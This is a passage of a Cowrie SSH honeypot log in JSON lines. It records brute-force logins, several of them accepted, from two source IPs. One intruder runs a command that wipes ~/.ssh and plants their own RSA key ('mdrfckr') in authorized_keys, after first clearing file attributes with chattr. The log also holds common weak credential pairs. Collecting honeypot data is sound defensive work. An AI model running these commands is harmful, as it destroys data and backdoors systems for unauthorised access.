{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54402,"dst_ip":"1.2.3.4","dst_port":22,"session":"4728ae454dac","protocol":"ssh","message":"New connection: 212.227.235.229:54402 (1.2.3.4:22) [session: 4728ae454dac]","sensor":"my-vps","timestamp":"2025-08-26T04:06:08.825058Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:06:09.060908Z","src_ip":"212.227.235.229","session":"4728ae454dac"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:06:09.094989Z","src_ip":"212.227.235.229","session":"4728ae454dac"}
{"eventid":"cowrie.session.closed","duration":"79.0","message":"Connection lost after 79.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:06:10.153192Z","src_ip":"212.227.235.229","session":"d94db3d165e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36822,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd49fc02016b","protocol":"ssh","message":"New connection: 212.227.235.229:36822 (1.2.3.4:22) [session: dd49fc02016b]","sensor":"my-vps","timestamp":"2025-08-26T04:06:11.273401Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:06:11.274549Z","src_ip":"212.227.235.229","session":"dd49fc02016b"}
{"eventid":"cowrie.login.failed","username":"operator","password":"operator","message":"login attempt [operator/operator] failed","sensor":"my-vps","timestamp":"2025-08-26T04:06:11.879211Z","src_ip":"212.227.235.229","session":"4728ae454dac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54414,"dst_ip":"1.2.3.4","dst_port":22,"session":"7149a4f4d385","protocol":"ssh","message":"New connection: 212.227.235.229:54414 (1.2.3.4:22) [session: 7149a4f4d385]","sensor":"my-vps","timestamp":"2025-08-26T04:06:12.734318Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:06:12.739416Z","src_ip":"212.227.235.229","session":"7149a4f4d385"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:06:13.132876Z","src_ip":"212.227.235.229","session":"7149a4f4d385"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:06:13.293144Z","src_ip":"212.227.235.229","session":"dd49fc02016b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:06:13.876384Z","src_ip":"212.227.235.229","session":"39cf17347a71"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:06:14.019703Z","src_ip":"212.227.235.229","session":"4728ae454dac"}
{"eventid":"cowrie.login.success","username":"root","password":"1q2w3e!Q@W#E","message":"login attempt [root/1q2w3e!Q@W#E] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:06:14.058941Z","src_ip":"212.227.235.229","session":"dd49fc02016b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:06:14.620458Z","src_ip":"212.227.235.229","session":"dd49fc02016b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:06:14.621111Z","src_ip":"212.227.235.229","session":"dd49fc02016b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:06:14.622226Z","src_ip":"212.227.235.229","session":"dd49fc02016b"}
{"eventid":"cowrie.login.failed","username":"user","password":"1234","message":"login attempt [user/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T04:06:14.831347Z","src_ip":"212.227.235.229","session":"7149a4f4d385"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:06:14.878158Z","src_ip":"212.227.235.229","session":"dd49fc02016b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:06:15.414291Z","src_ip":"212.227.235.229","session":"dd49fc02016b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:06:15.415071Z","src_ip":"212.227.235.229","session":"dd49fc02016b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:06:15.672535Z","src_ip":"212.227.235.229","session":"dd49fc02016b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:06:15.673527Z","src_ip":"212.227.235.229","session":"dd49fc02016b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36836,"dst_ip":"1.2.3.4","dst_port":22,"session":"39ebc6aa390f","protocol":"ssh","message":"New connection: 212.227.235.229:36836 (1.2.3.4:22) [session: 39ebc6aa390f]","sensor":"my-vps","timestamp":"2025-08-26T04:06:15.919788Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:06:15.920498Z","src_ip":"212.227.235.229","session":"39ebc6aa390f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T04:06:16.304884Z","src_ip":"212.227.235.229","session":"39cf17347a71"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:06:16.756379Z","src_ip":"212.227.235.229","session":"7149a4f4d385"}
{"eventid":"cowrie.login.failed","username":"support","password":"admin","message":"login attempt [support/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T04:06:16.795193Z","src_ip":"212.227.235.229","session":"ec02a6dba47c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:06:17.124334Z","src_ip":"212.227.235.229","session":"39ebc6aa390f"}
{"eventid":"cowrie.session.closed","duration":"62.0","message":"Connection lost after 62.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:06:17.581106Z","src_ip":"212.227.235.229","session":"39cf17347a71"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:06:17.866951Z","src_ip":"212.227.235.229","session":"39ebc6aa390f"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:06:19.116608Z","src_ip":"212.227.235.229","session":"39ebc6aa390f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47902,"dst_ip":"1.2.3.4","dst_port":22,"session":"30d918ae3aeb","protocol":"ssh","message":"New connection: 212.227.235.229:47902 (1.2.3.4:22) [session: 30d918ae3aeb]","sensor":"my-vps","timestamp":"2025-08-26T04:06:19.372520Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:06:19.373232Z","src_ip":"212.227.235.229","session":"30d918ae3aeb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:06:19.637975Z","src_ip":"212.227.235.229","session":"30d918ae3aeb"}
{"eventid":"cowrie.session.closed","duration":"20.8","message":"Connection lost after 20.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:06:20.072775Z","src_ip":"212.227.235.229","session":"ec02a6dba47c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:06:21.322721Z","src_ip":"212.227.235.229","session":"30d918ae3aeb"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:06:21.583634Z","src_ip":"212.227.235.229","session":"30d918ae3aeb"}
{"eventid":"cowrie.session.closed","duration":"10.3","message":"Connection lost after 10.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:06:21.586258Z","src_ip":"212.227.235.229","session":"dd49fc02016b"}
{"eventid":"cowrie.login.success","username":"root","password":"ipscan","message":"login attempt [root/ipscan] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:06:22.028567Z","src_ip":"212.227.235.229","session":"17bc4c56080e"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":47898,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b4ec90555d4","protocol":"ssh","message":"New connection: 103.217.145.104:47898 (1.2.3.4:22) [session: 6b4ec90555d4]","sensor":"my-vps","timestamp":"2025-08-26T04:06:27.621274Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:06:27.621918Z","src_ip":"103.217.145.104","session":"6b4ec90555d4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sh